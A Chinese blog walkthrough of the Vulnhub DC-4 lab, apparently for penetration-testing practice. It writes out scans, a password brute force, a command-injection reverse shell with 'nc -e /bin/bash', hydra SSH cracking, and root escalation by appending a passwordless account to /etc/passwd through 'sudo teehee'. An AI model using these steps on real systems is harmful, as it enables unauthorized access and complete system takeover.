Vulnhub靶场实战———DC4

最新推荐文章于 2024-07-25 10:00:08 发布
最新推荐文章于 2024-07-25 10:00:08 发布
阅读量192 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67309561/article/details/130464185
版权

环境下载

DC and Five86 Series Challenges - DC-4

环境配置

 

注:DC4这关跟DC3一样只有一个FLAG,我们要通过提权的方法一步一步获取

信息探测 

nmap -sP 192.168.100.0/24
nmap -sV -A -p- 192.168.100.13

发现这里开着80端口以及ssh服务22端口,我们先进入80端口看一下

获取FLAG

进入了网站我们尝试弱口令爆破,万能密码输入,结果都不行,我们用AWVS尝试扫描一下

我们发现这个网站并不存在什么高危漏洞,可知,这应该是个简单的登录框,并不是什么cms,接下来我们尝试密码爆破

 爆破出他的密码为happy,我们登录进去看一看

发现他是通过命令的方式来执行的,我们用BP抓包看一下

 果然是这样,既然如此我们就通过这种方式来反弹shell

我们先开启nc监测 

 

接下来去BP那边修改一下请求包,并且发送

nc 192.168.100.13 1234 -e /bin/bash 
#	nc+192.168.79.128+8080+-e+/bin/bash 
#	空格+号代替

成功反弹 

 我们先查看一下有什么文件

我们找到了jim文件下包含了一个密码本,我们将此密码本保存下来,去kali中爆破一下

hydra -l jim -P 1.txt -I -T 64 ssh://192.168.100.13:22

 成功爆破出jim的密码,那我们就尝试登录

ssh jim@192.168.100.13 -p 22

 成功登录,他提示我们有一封邮件需要去查看一下,那我们去看一看

cd /var/mail

 我们得到了charles的密码,那我们登录他的账号看一下

发现什么都没有,那我们 查看 使用sudo运行的命令

sudo -l

发现提权关键词teehee,我们使用此命令来操作一下

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
# 用户名admin 没有密码为管理员权限 进入的时候运行/bin/bash

成功提权

那我们去root目录下获取FLAG

 成功获取,结束! 

Digh
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1923
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1876
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1746
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
Vulnhub-DC-4靶机实战
御七彩虹猫
04-07 2381
Vulnhub-DC-4靶机实战
记一次vulnhub|渗透测试DC-4(常规和非预期提权思路)
crispr的博客
02-02 952
Five86-2 0X01 Main Point 1.Burpsuite爆破模块进行简单爆破 2.Hydra爆破进行SSH连接 3.CVE-2019-10149–exim漏洞进行本地提权
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9034
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
Vulnhub-DC-4 靶场渗透练习
weixin_52451257的博客
01-27 2970
靶场地址: DC: 4 ~ VulnHub 第一步:信息收集 nmap -sn -T4 192.168.231.0/24 nmap -A -p- 192.168.231.152 正在上传…重新上传取消 dirb http://192.168.231.152 nikto -h http://192.168.231.152 python3 dirmap.py -i http://192.168.231.152 -lcf ls python3 dirsearch -u htt..
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
vulnhub靶场实战系列-DC-1实战流程图
05-17
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
dc4靶机实战记录thee追加提权
qq_45290991的博客
08-21 161
一、外网打点 80端口和22端口 22 hydra爆破不出来,80,sql注入扫不出来。直接爆破admin 账号admin 密码happy 进去之后发现命令执行: 能列出文件 ,ls。所以, bp抓包试试改命令。 nc反弹shell 交互式: python -c 'import pty;pty.spawn("/bin/sh")' 二、后渗透 在用户jim目录下发现一个old password 文件: 生成密码,爆破ssh用户,猜测本机还有什么用户。 破解ssh.
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4591
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
DC靶机渗透-DC4
weixin_41607190的博客
12-20 1761
设置成nat模式 发现主机 arp-scan -l #对局域网内的每个主机发送arp包,存在主机就会返回arp响应 端口扫描,看开启了哪些服务(端口对应服务)
构建稳固与安全的网络环境:从微软蓝屏事件中的教训学习
xingyu_qie的专栏
07-22 767
微软蓝屏”事件为我们提供了宝贵的教训和警示,即使是最大的科技公司也难以完全避免软件缺陷带来的灾难性后果。建设一个稳固和安全的网络环境需要多方面的努力:从有效的软件更新管理到强化的紧急响应能力,再到全员安全意识的培养和文化建设。只有综合运用技术、流程和人员培训,我们才能更好地应对未来可能出现的类似挑战,保护我们的数字基础设施和社会运行的稳定性与安全性。
企业如何保证公司内网安全
最新发布
shunyou0526的博客
07-25 370
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1169
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 471
2024安全大模型技术与市场研究报告
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能。在这个靶场中,你可以接触到加密方式和解密过程,对于第一次接触这种加密方式的人来说,可以使用在线站点来进行解密操作,提高对该加密方式的理解和熟悉度。 EMPIRE: BREAKOUT靶场是一个适合初学者的简单难度的靶场,对于计算机学习者来说,初期的学习往往是最迷茫和难以坚持的,但通过不断的学习和实践,经验和能力会得到提高。这个靶场可以帮助你探索和学习网络安全方面的知识和技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.csdn.net/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值